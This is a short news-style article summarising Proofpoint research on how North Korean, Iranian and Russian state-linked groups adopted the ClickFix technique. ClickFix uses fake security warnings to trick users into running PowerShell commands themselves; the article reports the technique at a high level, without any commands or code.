Thought Leadership
What began as a ploy by commercial cybercriminals is now becoming a method used by state-supported hacker groups: The ClickFix technique. Originally used by financially motivated attackers to circumvent security mechanisms, it is now being used specifically by actors from North Korea, Iran and Russia for espionage purposes.
Fake security messages are used to manipulate users into entering malicious PowerShell commands themselves – bypassing classic protective measures such as virus scanners and firewalls.
North Korea, Iran and Russia on a deceptive course
Observations by security researchers from Proofpoint show At the turn of the year 2024/2025, several well-known groups such as TA427 (North Korea), TA450 (Iran) as well as UNK_RemoteRogue and TA422 (Russia) successfully integrated ClickFix into their attack strategies. The attacks were carried out via deceptively genuine emails and websites.
For example, TA427 deceived employees of think tanks and smuggled the QuasarRAT spyware onto their computers. The Iranian group TA450, on the other hand, used fake Microsoft warnings to install so-called remote monitoring tools – and thus gained extensive access to entire systems.
Russian groups also adapted the method: UNK_RemoteRogue distributed infected Word documents, while TA422 relied on prepared Google spreadsheets and then accessed sensitive data via Metasploit and SSH tunnels.
Deception instead of technology: Why ClickFix is so dangerous
The key feature of ClickFix is that the user becomes the weak point – not through careless clicking, but through active participation. The classic infection chain, for example through macros in Office documents, is replaced by a psychological component. Anyone who follows the instructions in fake security warnings infects their system themselves – and unknowingly bypasses technical protection barriers in the process.
A look into the future of digital attacks
The fact that state hacker groups are adopting ClickFix so quickly shows the potential of this method. The technology is still at an early stage – but experts such as Proofpoint assume that it will be increasingly used in the future. This is because ClickFix is not only more difficult to detect than many conventional forms of attack – it is also more flexible to use and frighteningly effective.
Further information:
The full analysis by the Proofpoint experts can be found in the cybersecurity company’s latest threat blog.
(vp/Proofpoint)
